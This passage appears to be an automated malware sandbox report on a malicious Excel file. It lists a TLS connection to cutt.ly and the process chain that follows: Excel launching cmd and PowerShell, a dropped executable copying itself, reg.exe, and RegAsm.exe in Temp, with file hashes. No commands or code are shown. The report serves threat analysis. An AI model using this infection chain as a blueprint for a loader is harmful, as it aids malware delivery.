---|---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 19:05:20.849750996 CET | 104.22.0.232 | 443 | 192.168.2.22 | 49165 | CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Sat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017 | Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d |
CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Nov 02 13:24:33 CET 2017 | Tue Nov 02 13:24:33 CET 2027 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 19:04:38 |
Start date: | 05/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f7f0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:04:40 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4aa20000 |
File size: | 345088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:04:40 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4aa20000 |
File size: | 345088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:04:40 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4aa20000 |
File size: | 345088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:04:41 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fe30000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
General |
---|
Start time: | 19:04:41 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fe30000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
General |
---|
Start time: | 19:04:41 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fe30000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
General |
---|
Start time: | 19:05:08 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\AppData\Local\Temp\12.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 19:05:11 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4a4c0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:05:11 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8f0000 |
File size: | 62464 bytes |
MD5 hash: | D69A9ABBB0D795F21995C2F48C1EB560 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:05:22 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\ntrwe.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe90000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | low |
General |
---|
Start time: | 19:05:23 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\ntrwe.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe90000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | low |
General |
---|
Start time: | 19:05:24 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x250000 |
File size: | 64672 bytes |
MD5 hash: | ADF76F395D5A0ECBBF005390B73C3FD2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | moderate |
General |
---|
Start time: | 19:05:31 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\ntrwe.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe90000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 19:05:33 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1230000 |
File size: | 64672 bytes |
MD5 hash: | ADF76F395D5A0ECBBF005390B73C3FD2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|